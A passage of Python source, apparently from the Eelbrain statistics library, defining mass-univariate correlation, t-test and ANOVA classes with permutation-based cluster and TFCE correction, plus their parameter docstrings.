return "T-Contrast: %s ~ %s" % (self.y, self.contrast)
else:
return "T-Contrast: %s" % self.contrast
def _plot_model(self):
return self.x
def _repr_test_args(self):
args = [repr(self.y), repr(self.x), repr(self.contrast)]
if self.tail:
args.append("tail=%r" % self.tail)
if self.match:
args.append('match=%r' % self.match)
return args
class corr(NDTest):
"""Mass-univariate correlation
Parameters
----------
y : NDVar
Dependent variable.
x : continuous
The continuous predictor variable.
norm : None | categorial
Categories in which to normalize (z-score) x.
sub : index
Perform the test with a subset of the data.
ds : None | Dataset
If a Dataset is specified, all data-objects can be specified as
names of Dataset variables.
samples : int
Number of samples for permutation test (default 10,000).
pmin : None | scalar (0 < pmin < 1)
Threshold for forming clusters: use an r-value equivalent to an
uncorrected p-value.
rmin : None | scalar
Threshold for forming clusters.
tfce : bool | scalar
Use threshold-free cluster enhancement. Use a scalar to specify the
step of TFCE levels (for ``tfce is True``, 0.1 is used).
tstart : scalar
Start of the time window for the permutation test (default is the
beginning of ``y``).
tstop : scalar
Stop of the time window for the permutation test (default is the
end of ``y``).
match : None | categorial
When permuting data, only shuffle the cases within the categories
of match.
parc : str
Collect permutation statistics for all regions of the parcellation of
this dimension. For threshold-based test, the regions are disconnected.
mintime : scalar
Minimum duration for clusters (in seconds).
minsource : int
Minimum number of sources per cluster.
Attributes
----------
clusters : None | Dataset
For cluster-based tests, a table of all clusters. Otherwise a table of
all significant regions (or ``None`` if permutations were omitted).
See also the :meth:`.find_clusters` method.
p : NDVar | None
Map of p-values corrected for multiple comparison (or None if no
correction was performed).
p_uncorrected : NDVar
Map of p-values uncorrected for multiple comparison.
r : NDVar
Map of correlation values (with threshold contours).
tfce_map : NDVar | None
Map of the test statistic processed with the threshold-free cluster
enhancement algorithm (or None if no TFCE was performed).
"""
_state_specific = ('x', 'norm', 'n', 'df', 'r')
_statistic = 'r'
@user_activity
def __init__(
self,
y: NDVarArg,
x: VarArg,
norm: CategorialArg = None,
sub: IndexArg = None,
ds: Dataset = None,
samples: int = 10000,
pmin: float = None,
rmin: float = None,
tfce: Union[float, bool] = False,
tstart: float = None,
tstop: float = None,
match: CategorialArg = None,
parc: str = None,
**criteria):
sub = assub(sub, ds)
y = asndvar(y, sub=sub, ds=ds, dtype=np.float64)
check_for_vector_dim(y)
if not y.has_case:
raise ValueError("Dependent variable needs case dimension")
x = asvar(x, sub=sub, ds=ds)
if norm is not None:
norm = ascategorial(norm, sub, ds)
if match is not None:
match = ascategorial(match, sub, ds)
name = "%s corr %s" % (y.name, x.name)
# Normalize by z-scoring the data for each subject
# normalization is done before the permutation b/c we are interested in
# the variance associated with each subject for the z-scoring.
y = y.copy()
if norm is not None:
for cell in norm.cells:
idx = (norm == cell)
y.x[idx] = scipy.stats.zscore(y.x[idx], None)
# subtract the mean from y and x so that this can be omitted during
# permutation
y -= y.summary('case')
x = x - x.mean()
n = len(y)
df = n - 2
rmap = stats.corr(y.x, x.x)
n_threshold_params = sum((pmin is not None, rmin is not None, bool(tfce)))
if n_threshold_params == 0 and not samples:
threshold = cdist = None
elif n_threshold_params > 1:
raise ValueError("Only one of pmin, rmin and tfce can be specified")
else:
if pmin is not None:
threshold = stats.rtest_r(pmin, df)
elif rmin is not None:
threshold = abs(rmin)
else:
threshold = None
cdist = NDPermutationDistribution(
y, samples, threshold, tfce, 0, 'r', name,
tstart, tstop, criteria, parc)
cdist.add_original(rmap)
if cdist.do_permutation:
iterator = permute_order(n, samples, unit=match)
run_permutation(stats.corr, cdist, iterator, x.x)
# compile results
info = _info.for_stat_map('r', threshold)
r = NDVar(rmap, y.dims[1:], info, name)
# store attributes
NDTest.__init__(self, y, match, sub, samples, tfce, pmin, cdist,
tstart, tstop)
self.x = x.name
self.norm = None if norm is None else norm.name
self.rmin = rmin
self.n = n
self.df = df
self.r = r
self._expand_state()
def _expand_state(self):
NDTest._expand_state(self)
r = self.r
# uncorrected probability
pmap = stats.rtest_p(r.x, self.df)
info = _info.for_p_map()
p_uncorrected = NDVar(pmap, r.dims, info, 'p_uncorrected')
self.p_uncorrected = p_uncorrected
self.r_p = [[r, self.p]] if self.samples else None
def _name(self):
if self.y and self.x:
return "Correlation: %s ~ %s" % (self.y, self.x)
else:
return "Correlation"
def _repr_test_args(self):
args = [repr(self.y), repr(self.x)]
if self.norm:
args.append('norm=%r' % self.norm)
return args
def _default_plot_obj(self):
if self.samples:
return self.masked_parameter_map()
else:
return self.r
class NDDifferenceTest(NDTest):
difference = None
def _get_mask(self, p=0.05):
self._assert_has_cdist()
if not 1 >= p > 0:
raise ValueError(f"p={p}: needs to be between 1 and 0")
if p == 1:
if self._cdist.kind != 'cluster':
raise ValueError(f"p=1 is only a valid mask for threshold-based cluster tests")
mask = self._cdist.cluster_map == 0
else:
mask = self.p > p
return self._cdist.uncrop(mask, self.difference, True)
def masked_difference(self, p=0.05, name=None):
"""Difference map masked by significance
Parameters
----------
p : scalar
Threshold p-value for masking (default 0.05). For threshold-based
cluster tests, ``pmin=1`` includes all clusters regardless of their
p-value.
name : str
Name of the output NDVar.
"""
mask = self._get_mask(p)
return self.difference.mask(mask, name=name)
class NDMaskedC1Mixin:
def masked_c1(self, p=0.05):
"""``c1`` map masked by significance of the ``c1``-``c0`` difference
Parameters
----------
p : scalar
Threshold p-value for masking (default 0.05). For threshold-based
cluster tests, ``pmin=1`` includes all clusters regardless of their
p-value.
"""
mask = self._get_mask(p)
return self.c1_mean.mask(mask)
class ttest_1samp(NDDifferenceTest):
"""Mass-univariate one sample t-test
Parameters
----------
y : NDVar
Dependent variable.
popmean : scalar
Value to compare y against (default is 0).
match : None | categorial
Combine data for these categories before testing.
sub : index
Perform test with a subset of the data.
ds : None | Dataset
If a Dataset is specified, all data-objects can be specified as
names of Dataset variables
tail : 0 | 1 | -1
Which tail of the t-distribution to consider:
0: both (two-tailed);
1: upper tail (one-tailed);
-1: lower tail (one-tailed).
samples : int
Number of samples for permutation test (default 10,000).
pmin : None | scalar (0 < pmin < 1)
Threshold for forming clusters: use a t-value equivalent to an
uncorrected p-value.
tmin : scalar
Threshold for forming clusters as t-value.
tfce : bool | scalar
Use threshold-free cluster enhancement. Use a scalar to specify the
step of TFCE levels (for ``tfce is True``, 0.1 is used).
tstart : scalar
Start of the time window for the permutation test (default is the
beginning of ``y``).
tstop : scalar
Stop of the time window for the permutation test (default is the
end of ``y``).
parc : str
Collect permutation statistics for all regions of the parcellation of
this dimension. For threshold-based test, the regions are disconnected.
force_permutation: bool
Conduct permutations regardless of whether there are any clusters.
mintime : scalar
Minimum duration for clusters (in seconds).
minsource : int
Minimum number of sources per cluster.
Attributes
----------
clusters : None | Dataset
For cluster-based tests, a table of all clusters. Otherwise a table of
all significant regions (or ``None`` if permutations were omitted).
See also the :meth:`.find_clusters` method.
difference : NDVar
The difference value entering the test (``y`` if popmean is 0).
n : int
Number of cases.
p : NDVar | None
Map of p-values corrected for multiple comparison (or None if no
correction was performed).
p_uncorrected : NDVar
Map of p-values uncorrected for multiple comparison.
t : NDVar
Map of t-values.
tfce_map : NDVar | None
Map of the test statistic processed with the threshold-free cluster
enhancement algorithm (or None if no TFCE was performed).
Notes
-----
Data points with zero variance are set to t=0.
"""
_state_specific = ('popmean', 'tail', 'n', 'df', 't', 'difference')
_statistic = 't'
@user_activity
def __init__(
self,
y: NDVarArg,
popmean: float = 0,
match: CategorialArg = None,
sub: IndexArg = None,
ds: Dataset = None,
tail: int = 0,
samples: int = 10000,
pmin: float = None,
tmin: float = None,
tfce: Union[float, bool] = False,
tstart: float = None,
tstop: float = None,
parc: str = None,
force_permutation: bool = False,
**criteria):
ct = Celltable(y, match=match, sub=sub, ds=ds, coercion=asndvar, dtype=np.float64)
check_for_vector_dim(ct.y)
n = len(ct.y)
df = n - 1
y = ct.y.summary()
tmap = stats.t_1samp(ct.y.x)
if popmean:
raise NotImplementedError("popmean != 0")
diff = y - popmean
if np.any(diff < 0):
diff.info['cmap'] = 'xpolar'
else:
diff = y
n_threshold_params = sum((pmin is not None, tmin is not None, bool(tfce)))
if n_threshold_params == 0 and not samples:
threshold = cdist = None
elif n_threshold_params > 1:
raise ValueError("Only one of pmin, tmin and tfce can be specified")
else:
if pmin is not None:
threshold = stats.ttest_t(pmin, df, tail)
elif tmin is not None:
threshold = abs(tmin)
else:
threshold = None
if popmean:
y_perm = ct.y - popmean
else:
y_perm = ct.y
n_samples, samples = _resample_params(len(y_perm), samples)
cdist = NDPermutationDistribution(
y_perm, n_samples, threshold, tfce, tail, 't', '1-Sample t-Test',
tstart, tstop, criteria, parc, force_permutation)
cdist.add_original(tmap)
if cdist.do_permutation:
iterator = permute_sign_flip(n, samples)
run_permutation(opt.t_1samp_perm, cdist, iterator)
# NDVar map of t-values
info = _info.for_stat_map('t', threshold, tail=tail, old=ct.y.info)
t = NDVar(tmap, ct.y.dims[1:], info, 't')
# store attributes
NDDifferenceTest.__init__(self, ct.y, ct.match, sub, samples, tfce, pmin, cdist, tstart, tstop)
self.popmean = popmean
self.n = n
self.df = df
self.tail = tail
self.t = t
self.tmin = tmin
self.difference = diff
self._expand_state()
def __setstate__(self, state):
if 'diff' in state:
state['difference'] = state.pop('diff')
NDTest.__setstate__(self, state)
def _expand_state(self):
NDTest._expand_state(self)
t = self.t
pmap = stats.ttest_p(t.x, self.df, self.tail)
info = _info.for_p_map(t.info)
p_uncorr = NDVar(pmap, t.dims, info, 'p')
self.p_uncorrected = p_uncorr
def _name(self):
if self.y:
return "One-Sample T-Test: %s" % self.y
else:
return "One-Sample T-Test"
def _repr_test_args(self):
args = [repr(self.y)]
if self.popmean:
args.append(repr(self.popmean))
if self.match:
args.append('match=%r' % self.match)
if self.tail:
args.append("tail=%i" % self.tail)
return args
def _default_plot_obj(self):
if self.samples:
return self.masked_difference()
else:
return self.difference
class ttest_ind(NDDifferenceTest):
"""Mass-univariate independent samples t-test
Parameters
----------
y : NDVar
Dependent variable.
x : categorial | NDVar
Model containing the cells which should be compared, or NDVar to which
``y`` should be compared. In the latter case, the next three parameters
are ignored.
c1 : str | tuple | None
Test condition (cell of ``x``). ``c1`` and ``c0`` can be omitted if
``x`` only contains two cells, in which case cells will be used in
alphabetical order.
c0 : str | tuple | None
Control condition (cell of ``x``).
match : categorial
Combine cases with the same cell on ``x % match``.
sub : index
Perform the test with a subset of the data.
ds : None | Dataset
If a Dataset is specified, all data-objects can be specified as
names of Dataset variables.
tail : 0 | 1 | -1
Which tail of the t-distribution to consider:
0: both (two-tailed);
1: upper tail (one-tailed);
-1: lower tail (one-tailed).
samples : int
Number of samples for permutation test (default 10,000).
pmin : None | scalar (0 < pmin < 1)
Threshold p value for forming clusters. None for threshold-free
cluster enhancement.
tmin : scalar
Threshold for forming clusters as t-value.
tfce : bool | scalar
Use threshold-free cluster enhancement. Use a scalar to specify the
step of TFCE levels (for ``tfce is True``, 0.1 is used).
tstart : scalar
Start of the time window for the permutation test (default is the
beginning of ``y``).
tstop : scalar
Stop of the time window for the permutation test (default is the
end of ``y``).
parc : str
Collect permutation statistics for all regions of the parcellation of
this dimension. For threshold-based test, the regions are disconnected.
force_permutation: bool
Conduct permutations regardless of whether there are any clusters.
mintime : scalar
Minimum duration for clusters (in seconds).
minsource : int
Minimum number of sources per cluster.
Attributes
----------
c1_mean : NDVar
Mean in the c1 condition.
c0_mean : NDVar
Mean in the c0 condition.
clusters : None | Dataset
For cluster-based tests, a table of all clusters. Otherwise a table of
all significant regions (or ``None`` if permutations were omitted).
See also the :meth:`.find_clusters` method.
difference : NDVar
Difference between the mean in condition c1 and condition c0.
p : NDVar | None
Map of p-values corrected for multiple comparison (or None if no
correction was performed).
p_uncorrected : NDVar
Map of p-values uncorrected for multiple comparison.
t : NDVar
Map of t-values.
tfce_map : NDVar | None
Map of the test statistic processed with the threshold-free cluster
enhancement algorithm (or None if no TFCE was performed).
Notes
-----
Cases with zero variance are set to t=0.
"""
_state_specific = ('x', 'c1', 'c0', 'tail', 't', 'n1', 'n0', 'df', 'c1_mean',
'c0_mean')
_statistic = 't'
@user_activity
def __init__(
self,
y: NDVarArg,
x: Union[CategorialArg, NDVarArg],
c1: CellArg = None,
c0: CellArg = None,
match: CategorialArg = None,
sub: IndexArg = None,
ds: Dataset = None,
tail: int = 0,
samples: int = 10000,
pmin: float = None,
tmin: float = None,
tfce: Union[float, bool] = False,
tstart: float = None,
tstop: float = None,
parc: str = None,
force_permutation: bool = False,
**criteria):
y, y1, y0, c1, c0, match, x_name, c1_name, c0_name = _independent_measures_args(y, x, c1, c0, match, ds, sub, True)
check_for_vector_dim(y)
n1 = len(y1)
n = len(y)
n0 = n - n1
df = n - 2
groups = np.arange(n) < n1
groups.dtype = np.int8
tmap = stats.t_ind(y.x, groups)
n_threshold_params = sum((pmin is not None, tmin is not None, bool(tfce)))
if n_threshold_params == 0 and not samples:
threshold = cdist = None
elif n_threshold_params > 1:
raise ValueError("Only one of pmin, tmin and tfce can be specified")
else:
if pmin is not None:
threshold = stats.ttest_t(pmin, df, tail)
elif tmin is not None:
threshold = abs(tmin)
else:
threshold = None
cdist = NDPermutationDistribution(y, samples, threshold, tfce, tail, 't', 'Independent Samples t-Test', tstart, tstop, criteria, parc, force_permutation)
cdist.add_original(tmap)
if cdist.do_permutation:
iterator = permute_order(n, samples)
run_permutation(stats.t_ind, cdist, iterator, groups)
# store attributes
NDDifferenceTest.__init__(self, y, match, sub, samples, tfce, pmin, cdist, tstart, tstop)
self.x = x_name
self.c0 = c0
self.c1 = c1
self.n1 = n1
self.n0 = n0
self.df = df
self.tail = tail
info = _info.for_stat_map('t', threshold, tail=tail, old=y.info)
self.t = NDVar(tmap, y.dims[1:], info, 't')
self.tmin = tmin
self.c1_mean = y1.mean('case', name=cellname(c1_name))
self.c0_mean = y0.mean('case', name=cellname(c0_name))
self._expand_state()
def _expand_state(self):
NDTest._expand_state(self)
# difference
diff = self.c1_mean - self.c0_mean
if np.any(diff.x < 0):
diff.info['cmap'] = 'xpolar'
diff.name = 'difference'
self.difference = diff
# uncorrected p
pmap = stats.ttest_p(self.t.x, self.df, self.tail)
info = _info.for_p_map(self.t.info)
p_uncorr = NDVar(pmap, self.t.dims, info, 'p')
self.p_uncorrected = p_uncorr
# composites
if self.samples:
diff_p = self.masked_difference()
else:
diff_p = self.difference
self.all = [self.c1_mean, self.c0_mean, diff_p]
def _name(self):
cmp = '=><'[self.tail]
desc = f"{self.c1} {cmp} {self.c0}"
if self.y:
desc = f"{self.y} ~ {desc}"
return f"Independent-Samples T-Test: {desc}"
def _plot_model(self):
return self.x
def _plot_sub(self):
return "(%s).isin(%s)" % (self.x, (self.c1, self.c0))
def _repr_test_args(self):
if self.c1 is None:
args = [f'{self.y!r} (n={self.n1})', f'{self.x!r} (n={self.n0})']
else:
args = [f'{self.y!r}', f'{self.x!r}', f'{self.c1!r} (n={self.n1})', f'{self.c0!r} (n={self.n0})']
if self.match:
args.append(f'match{self.match!r}')
if self.tail:
args.append(f'tail={self.tail}')
return args
def _default_plot_obj(self):
if self.samples:
diff = self.masked_difference()
else:
diff = self.difference
return [self.c1_mean, self.c0_mean, diff]
class ttest_rel(NDMaskedC1Mixin, NDDifferenceTest):
"""Mass-univariate related samples t-test
Parameters
----------
y : NDVar
Dependent variable.
x : categorial | NDVar
Model containing the cells which should be compared, or NDVar to which
``y`` should be compared. In the latter case, the next three parameters
are ignored.
c1 : str | tuple | None
Test condition (cell of ``x``). ``c1`` and ``c0`` can be omitted if
``x`` only contains two cells, in which case cells will be used in
alphabetical order.
c0 : str | tuple | None
Control condition (cell of ``x``).
match : categorial
Units within which measurements are related (e.g. 'subject' in a
within-subject comparison).
sub : index
Perform the test with a subset of the data.
ds : None | Dataset
If a Dataset is specified, all data-objects can be specified as
names of Dataset variables.
tail : 0 | 1 | -1
Which tail of the t-distribution to consider:
0: both (two-tailed, default);
1: upper tail (one-tailed);
-1: lower tail (one-tailed).
samples : int
Number of samples for permutation test (default 10,000).
pmin : None | scalar (0 < pmin < 1)
Threshold for forming clusters: use a t-value equivalent to an
uncorrected p-value.
tmin : scalar
Threshold for forming clusters as t-value.
tfce : bool | scalar
Use threshold-free cluster enhancement. Use a scalar to specify the
step of TFCE levels (for ``tfce is True``, 0.1 is used).
tstart : scalar
Start of the time window for the permutation test (default is the
beginning of ``y``).
tstop : scalar
Stop of the time window for the permutation test (default is the
end of ``y``).
parc : str
Collect permutation statistics for all regions of the parcellation of
this dimension. For threshold-based test, the regions are disconnected.
force_permutation: bool
Conduct permutations regardless of whether there are any clusters.
mintime : scalar
Minimum duration for clusters (in seconds).
minsource : int
Minimum number of sources per cluster.
Attributes
----------
c1_mean : NDVar
Mean in the c1 condition.
c0_mean : NDVar
Mean in the c0 condition.
clusters : None | Dataset
For cluster-based tests, a table of all clusters. Otherwise a table of
all significant regions (or ``None`` if permutations were omitted).
See also the :meth:`.find_clusters` method.
difference : NDVar
Difference between the mean in condition c1 and condition c0.
p : NDVar | None
Map of p-values corrected for multiple comparison (or None if no
correction was performed).
p_uncorrected : NDVar
Map of p-values uncorrected for multiple comparison.
t : NDVar
Map of t-values.
tfce_map : NDVar | None
Map of the test statistic processed with the threshold-free cluster
enhancement algorithm (or None if no TFCE was performed).
n : int
Number of cases.
Notes
-----
Also known as dependent t-test, paired t-test or repeated measures t-test.
In the permutation cluster test, permutations are done within the
categories of ``match``.
Cases with zero variance are set to t=0.
"""
_state_specific = ('x', 'c1', 'c0', 'tail', 't', 'n', 'df', 'c1_mean',
'c0_mean')
_statistic = 't'
@user_activity
def __init__(
self,
y: NDVarArg,
x: Union[CategorialArg, NDVarArg],
c1: CellArg = None,
c0: CellArg = None,
match: CategorialArg = None,
sub: IndexArg = None,
ds: Dataset = None,
tail: int = 0,
samples: int = 10000,
pmin: float = None,
tmin: float = None,
tfce: Union[float, bool] = False,
tstart: float = None,
tstop: float = None,
parc: str = None,
force_permutation: bool = False,
**criteria):
y1, y0, c1, c0, match, n, x_name, c1, c1_name, c0, c0_name = _related_measures_args(y, x, c1, c0, match, ds, sub, True)
check_for_vector_dim(y1)
if n <= 2:
raise ValueError("Not enough observations for t-test (n=%i)" % n)
df = n - 1
diff = y1 - y0
tmap = stats.t_1samp(diff.x)
n_threshold_params = sum((pmin is not None, tmin is not None, bool(tfce)))
if n_threshold_params == 0 and not samples:
threshold = cdist = None
elif n_threshold_params > 1:
raise ValueError("Only one of pmin, tmin and tfce can be specified")
else:
if pmin is not None:
threshold = stats.ttest_t(pmin, df, tail)
elif tmin is not None:
threshold = abs(tmin)
else:
threshold = None
n_samples, samples = _resample_params(len(diff), samples)
cdist = NDPermutationDistribution(
diff, n_samples, threshold, tfce, tail, 't', 'Related Samples t-Test',
tstart, tstop, criteria, parc, force_permutation)
cdist.add_original(tmap)
if cdist.do_permutation:
iterator = permute_sign_flip(n, samples)
run_permutation(opt.t_1samp_perm, cdist, iterator)
# NDVar map of t-values
info = _info.for_stat_map('t', threshold, tail=tail, old=y1.info)
t = NDVar(tmap, y1.dims[1:], info, 't')
# store attributes
NDDifferenceTest.__init__(self, y1, match, sub, samples, tfce, pmin, cdist, tstart, tstop)
self.x = x_name
self.c0 = c0
self.c1 = c1
self.n = n
self.df = df
self.tail = tail
self.t = t
self.tmin = tmin
self.c1_mean = y1.mean('case', name=cellname(c1_name))
self.c0_mean = y0.mean('case', name=cellname(c0_name))
self._expand_state()
def _expand_state(self):
NDTest._expand_state(self)
cdist = self._cdist
t = self.t
# difference
diff = self.c1_mean - self.c0_mean
if np.any(diff.x < 0):
diff.info['cmap'] = 'xpolar'
diff.name = 'difference'
self.difference = diff
# uncorrected p
pmap = stats.ttest_p(t.x, self.df, self.tail)
info = _info.for_p_map()
self.p_uncorrected = NDVar(pmap, t.dims, info, 'p')
# composites
if self.samples:
diff_p = self.masked_difference()
else:
diff_p = self.difference
self.all = [self.c1_mean, self.c0_mean, diff_p]
def _name(self):
if self.tail == 0:
comp = "%s == %s" % (self.c1, self.c0)
elif self.tail > 0:
comp = "%s > %s" % (self.c1, self.c0)
else:
comp = "%s < %s" % (self.c1, self.c0)
if self.y:
return "Related-Samples T-Test: %s ~ %s" % (self.y, comp)
else:
return "Related-Samples T-Test: %s" % comp
def _plot_model(self):
return self.x
def _plot_sub(self):
return "(%s).isin(%s)" % (self.x, (self.c1, self.c0))
def _repr_test_args(self):
args = [repr(self.y), repr(self.x)]
if self.c1 is not None:
args.extend((repr(self.c1), repr(self.c0), repr(self.match)))
args[-1] += " (n=%i)" % self.n
if self.tail:
args.append("tail=%i" % self.tail)
return args
def _default_plot_obj(self):
if self.samples:
diff = self.masked_difference()
else:
diff = self.difference
return [self.c1_mean, self.c0_mean, diff]
class MultiEffectNDTest(NDTest):
def _repr_test_args(self):
args = [repr(self.y), repr(self.x)]
if self.match is not None:
args.append('match=%r' % self.match)
return args
def _repr_cdist(self):
args = self._cdist[0]._repr_test_args(self.pmin)
for cdist in self._cdist:
effect_args = cdist._repr_clusters()
args.append("%r: %s" % (cdist.name, ', '.join(effect_args)))
return args
def _asfmtext(self):
table = fmtxt.Table('llll')
table.cells('Effect', fmtxt.symbol(self._statistic, 'max'), fmtxt.symbol('p'), 'sig')
table.midrule()
for i, effect in enumerate(self.effects):
table.cell(effect)
table.cell(fmtxt.stat(self._max_statistic(i)))
pmin = self.p[i].min()
table.cell(fmtxt.p(pmin))
table.cell(star(pmin))
return table
def _expand_state(self):
self.effects = tuple(e.name for e in self._effects)
# clusters
cdists = self._cdist
if cdists is None:
self._kind = None
else:
self.tfce_maps = [cdist.tfce_map for cdist in cdists]
self.p = [cdist.probability_map for cdist in cdists]
self._kind = cdists[0].kind
def _effect_index(self, effect: Union[int, str]):
if isinstance(effect, str):
return self.effects.index(effect)
else:
return effect
def _iter_cdists(self):
for cdist in self._cdist:
yield cdist.name.capitalize(), cdist
@property
def _first_cdist(self):
if self._cdist is None:
return None
else:
return self._cdist[0]
def _max_statistic(self, effect: Union[str, int]):
i = self._effect_index(effect)
stat_map = self._statistic_map[i]
tail = getattr(self, 'tail', self._statistic_tail)
return self._max_statistic_from_map(stat_map, self.p[i], tail)
def cluster(self, cluster_id, effect=0):
"""Retrieve a specific cluster as NDVar
Parameters
----------
cluster_id : int
Cluster id.
effect : int | str
Index or name of the effect from which to retrieve a cluster
(default is the first effect).
Returns
-------
cluster : NDVar
NDVar of the cluster, 0 outside the cluster.
Notes
-----
Clusters only have stable ids for thresholded cluster distributions.
"""
self._assert_has_cdist()
i = self._effect_index(effect)
return self._cdist[i].cluster(cluster_id)
def compute_probability_map(self, effect=0, **sub):
"""Compute a probability map
Parameters
----------
effect : int | str
Index or name of the effect from which to use the parameter map
(default is the first effect).
Returns
-------
probability : NDVar
Map of p-values.
"""
self._assert_has_cdist()
i = self._effect_index(effect)
return self._cdist[i].compute_probability_map(**sub)
def masked_parameter_map(self, effect=0, pmin=0.05, **sub):
"""Create a copy of the parameter map masked by significance
Parameters
----------
effect : int | str
Index or name of the effect from which to use the parameter map.
pmin : scalar
Threshold p-value for masking (default 0.05). For threshold-based
cluster tests, ``pmin=1`` includes all clusters regardless of their
p-value.
Returns
-------
masked_map : NDVar
NDVar with data from the original parameter map wherever p <= pmin
and 0 everywhere else.
"""
self._assert_has_cdist()
i = self._effect_index(effect)
return self._cdist[i].masked_parameter_map(pmin, **sub)
def find_clusters(self, pmin=None, maps=False, effect=None, **sub):
"""Find significant regions or clusters
Parameters
----------
pmin : None | scalar, 1 >= p >= 0
Threshold p-value. For threshold-based tests, all clusters with a
p-value smaller than ``pmin`` are included (default 1);
for other tests, find contiguous regions with ``p ≤ pmin`` (default
0.05).
maps : bool
Include in the output a map of every cluster (can be memory
intensive if there are large statistical maps and/or many
clusters; default ``False``).
effect : int | str
Index or name of the effect from which to find clusters (default is
all effects).
Returns
-------
ds : Dataset
Dataset with information about the clusters.
"""
self._assert_has_cdist()
if effect is not None:
i = self._effect_index(effect)
cdist = self._cdist[i]
ds = cdist.clusters(pmin, maps, **sub)
ds[:, 'effect'] = cdist.name
return ds
dss = [self.find_clusters(pmin, maps, i, **sub) for i in range(len(self.effects))]
info = {}
for ds, cdist in zip(dss, self._cdist):
if 'clusters' in ds.info:
info[f'{cdist.name} clusters'] = ds.info.pop('clusters')
out = combine(dss)
out.info.update(info)
return out
def find_peaks(self):
"""Find peaks in a TFCE distribution
Returns
-------
ds : Dataset
Dataset with information about the peaks.
"""
self._assert_has_cdist()
dss = []
for cdist in self._cdist:
ds = cdist.find_peaks()
ds[:, 'effect'] = cdist.name
dss.append(ds)
return combine(dss)
class anova(MultiEffectNDTest):
"""Mass-univariate ANOVA
Parameters
----------
y : NDVar
Dependent variable.
x : Model
Independent variables.
sub : index
Perform the test with a subset of the data.
ds : None | Dataset
If a Dataset is specified, all data-objects can be specified as
names of Dataset variables.
samples : int
Number of samples for permutation test (default 10,000).
pmin : None | scalar (0 < pmin < 1)
Threshold for forming clusters: use an f-value equivalent to an
uncorrected p-value.
fmin : scalar
Threshold for forming clusters as f-value.
tfce : bool | scalar
Use threshold-free cluster enhancement. Use a scalar to specify the
step of TFCE levels (for ``tfce is True``, 0.1 is used).
replacement : bool
whether random samples should be drawn with replacement or
without
tstart : scalar
Start of the time window for the permutation test (default is the
beginning of ``y``).
tstop : scalar
Stop of the time window for the permutation test (default is the
end of ``y``).
match : categorial | False
When permuting data, only shuffle the cases within the categories
of match. By default, ``match`` is determined automatically based on
the random efects structure of ``x``.
parc : str
Collect permutation statistics for all regions of the parcellation of
this dimension. For threshold-based test, the regions are disconnected.
force_permutation: bool
Conduct permutations regardless of whether there are any clusters.
mintime : scalar
Minimum duration for clusters (in seconds).
minsource : int
Minimum number of sources per cluster.
Attributes
----------
effects : tuple of str
Names of the tested effects, in the same order as in other attributes.
clusters : None | Dataset
For cluster-based tests, a table of all clusters. Otherwise a table of
all significant regions (or ``None`` if permutations were omitted).
See also the :meth:`.find_clusters` method.
f : list of NDVar
Maps of F values.
p : list of NDVar | None
Maps of p-values corrected for multiple comparison (or None if no
correction was performed).
p_uncorrected : list of NDVar
Maps of p-values uncorrected for multiple comparison.
tfce_maps : list of NDVar | None
Maps of the test statistic processed with the threshold-free cluster
enhancement algorithm (or None if no TFCE was performed).
Examples
--------
For information on model specification see the univariate
:func:`~eelbrain.test.anova` examples.
"""
_state_specific = ('x', 'pmin', '_effects', '_dfs_denom', 'f')
_statistic = 'f'
_statistic_tail = 1
@user_activity
def __init__(
self,
y: NDVarArg,
x: ModelArg,
sub: IndexArg = None,
ds: Dataset = None,
samples: int = 10000,
pmin: float = None,
fmin: float = None,
tfce: Union[float, bool] = False,
tstart: float = None,
tstop: float = None,
match: Union[CategorialArg, bool] = None,
parc: str = None,
force_permutation: bool = False,
**criteria):
x_arg = x
sub_arg = sub
sub = assub(sub, ds)
y = asndvar(y, sub, ds, dtype=np.float64)
check_for_vector_dim(y)
x = asmodel(x, sub, ds)
if match is None:
random_effects = [e for e in x.effects if e.random]
if not random_effects:
match = None
elif len(random_effects) > 1:
raise NotImplementedError(
"Automatic match parameter for model with more than one "
"random effect. Set match manually.")
else:
match = random_effects[0]
elif match is not False:
match = ascategorial(match, sub, ds)
lm = _nd_anova(x)
effects = lm.effects
dfs_denom = lm.dfs_denom
fmaps = lm.map(y.x)
n_threshold_params = sum((pmin is not None, fmin is not None, bool(tfce)))
if n_threshold_params == 0 and not samples:
cdists = None
thresholds = tuple(repeat(None, len(effects)))
elif n_threshold_params > 1:
raise ValueError("Only one of pmin, fmin and tfce can be specified")
else:
if pmin is not None:
thresholds = tuple(stats.ftest_f(pmin, e.df, df_den) for e, df_den in zip(effects, dfs_denom))
elif fmin is not None:
thresholds = tuple(repeat(abs(fmin), len(effects)))
else:
thresholds = tuple(repeat(None, len(effects)))
cdists = [
NDPermutationDistribution(
y, samples, thresh, tfce, 1, 'f', e.name,
tstart, tstop, criteria, parc, force_permutation)
for e, thresh in zip(effects, thresholds)]
# Find clusters in the actual data
do_permutation = 0
for cdist, fmap in zip(cdists, fmaps):
cdist.add_original(fmap)
do_permutation += cdist.do_permutation
if do_permutation:
iterator = permute_order(len(y), samples, unit=match)
run_permutation_me(lm, cdists, iterator)
# create ndvars
dims = y.dims[1:]
f = []
for e, fmap, df_den, f_threshold in zip(effects, fmaps, dfs_denom, thresholds):
info = _info.for_stat_map('f', f_threshold, tail=1, old=y.info)
f.append(NDVar(fmap, dims, info, e.name))
# store attributes
MultiEffectNDTest.__init__(self, y, match, sub_arg, samples, tfce, pmin,
cdists, tstart, tstop)
self.x = x_arg if isinstance(x_arg, str) else x.name
self._effects = effects
self._dfs_denom = dfs_denom
self.f = f
self._expand_state()
def _expand_state(self):
# backwards compatibility
if hasattr(self, 'effects'):
self._effects = self.effects
MultiEffectNDTest._expand_state(self)
# backwards compatibility
if hasattr(self, 'df_den'):
df_den_temp = {e.name: df for e, df in self.df_den.items()}
del self.df_den
self._dfs_denom = tuple(df_den_temp[e] for e in self.effects)
# f-maps with clusters
pmin = self.pmin or 0.05
if self.samples:
f_and_clusters = []
for e, fmap, df_den, cdist in zip(self._effects, self.f,
self._dfs_denom, self._cdist):
# create f-map with cluster threshold
f0 = stats.ftest_f(pmin, e.df, df_den)
info = _info.for_stat_map('f', f0)
f_ = NDVar(fmap.x, fmap.dims, info, e.name)
# add overlay with cluster
if cdist.probability_map is not None:
f_and_clusters.append([f_, cdist.probability_map])
else:
f_and_clusters.append([f_])
self.f_probability = f_and_clusters
# uncorrected probability
p_uncorr = []
for e, f, df_den in zip(self._effects, self.f, self._dfs_denom):
info = _info.for_p_map()
pmap = stats.ftest_p(f.x, e.df, df_den)
p_ = NDVar(pmap, f.dims, info, e.name)
p_uncorr.append(p_)
self.p_uncorrected = p_uncorr
def _name(self):
